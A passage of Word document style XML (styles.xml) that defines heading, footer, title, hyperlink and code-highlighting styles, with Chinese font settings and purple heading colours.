      <w:spacing w:before="340" w:after="330" w:line="578" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:color w:val="7030A0"/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="260" w:after="260" w:line="416" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria"/>
      <w:bCs/>
      <w:color w:val="7030A0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="260" w:after="260" w:line="416" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:color w:val="7030A0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="280" w:after="290" w:line="376" w:lineRule="auto"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria"/>
      <w:bCs/>
      <w:color w:val="7030A0"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="5Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="280" w:after="290" w:line="376" w:lineRule="auto"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:color w:val="7030A0"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="6Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="64" w:line="320" w:lineRule="auto"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria"/>
      <w:bCs/>
      <w:color w:val="7030A0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="7Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="64" w:line="320" w:lineRule="auto"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:color w:val="7030A0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="8Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="64" w:line="320" w:lineRule="auto"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria"/>
      <w:color w:val="7030A0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="9Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="64" w:line="320" w:lineRule="auto"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria"/>
      <w:color w:val="7030A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35B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35B85"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="页脚 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1Char">
    <w:name w:val="标题 1 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="楷体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="7030A0"/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="2Char">
    <w:name w:val="标题 2 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="7030A0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="3Char">
    <w:name w:val="标题 3 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="楷体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="7030A0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="4Char">
    <w:name w:val="标题 4 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="7030A0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="5Char">
    <w:name w:val="标题 5 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="楷体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="7030A0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="6Char">
    <w:name w:val="标题 6 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="6"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="7030A0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="7Char">
    <w:name w:val="标题 7 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="楷体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="7030A0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8Char">
    <w:name w:val="标题 8 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="7030A0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="9Char">
    <w:name w:val="标题 9 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="9"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="7030A0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="文档结构图 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="Char2"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria"/>
      <w:b w:val="0"/>
      <w:bCs/>
      <w:color w:val="200AC6"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char2">
    <w:name w:val="标题 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:color w:val="200AC6"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D35B85"/>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D35B85"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTMLChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D35B8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D35B85"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="List Paragraph"/>
    <w:aliases w:val="标题7"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CharCharCharChar">
    <w:name w:val="Char Char Char Char"/>
    <w:basedOn w:val="a"/>
    <w:semiHidden/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:widowControl/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
      <w:jc w:val="left"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Verdana"/>
      <w:b w:val="0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char3">
    <w:name w:val="批注框文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="楷体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p0">
    <w:name w:val="p0"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cnblogscodecopy">
    <w:name w:val="cnblogs_code_copy"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="tcnt">
    <w:name w:val="tcnt"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tdep">
    <w:name w:val="tdep"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pleft">
    <w:name w:val="pleft"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="blogsep">
    <w:name w:val="blogsep"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:styleId="ab">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fc03">
    <w:name w:val="fc03"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pright">
    <w:name w:val="pright"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="zihao">
    <w:name w:val="zihao"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="iblock">
    <w:name w:val="iblock"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTML0">
    <w:name w:val="HTML Code"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ac">
    <w:name w:val="Strong"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mw-headline">
    <w:name w:val="mw-headline"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mw-editsection">
    <w:name w:val="mw-editsection"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mw-editsection-bracket">
    <w:name w:val="mw-editsection-bracket"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:styleId="ad">
    <w:name w:val="FollowedHyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D35B85"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="navtoggle">
    <w:name w:val="navtoggle"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="togglehide">
    <w:name w:val="togglehide"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="views">
    <w:name w:val="views"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="exp-tag">
    <w:name w:val="exp-tag"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="step">
    <w:name w:val="step"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="f14-b">
    <w:name w:val="f14-b"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="f16-b">
    <w:name w:val="f16-b"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="f14">
    <w:name w:val="f14"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b w:val="0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ad0">
    <w:name w:val="ad"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b w:val="0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="日期1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="author">
    <w:name w:val="author"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="addcomment">
    <w:name w:val="addcomment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="comments">
    <w:name w:val="comments"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="wpkeywordlinkaffiliate">
    <w:name w:val="wp_keywordlink_affiliate"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="blue">
    <w:name w:val="blue"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D35B85"/>
  </w:style>
  <w:style w:type="table" w:styleId="ae">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00D35B85"/>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reprocessor">
    <w:name w:val="preprocessor"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00505802"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="keyword">
    <w:name w:val="keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00505802"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="string">
    <w:name w:val="string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00505802"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="comment">
    <w:name w:val="comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="005058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5B85"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="楷体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="340" w:after="330" w:line="578" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:color w:val="7030A0"/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="260" w:after="260" w:line="416" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria"/>
      <w:bCs/>
      <w:color w:val="7030A0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="260" w:after="260" w:line="416" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:color w:val="7030A0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="280" w:after="290" w:line="376" w:lineRule="auto"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria"/>
      <w:bCs/>
      <w:color w:val="7030A0"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="5Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="280" w:after="290" w:line="376" w:lineRule="auto"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
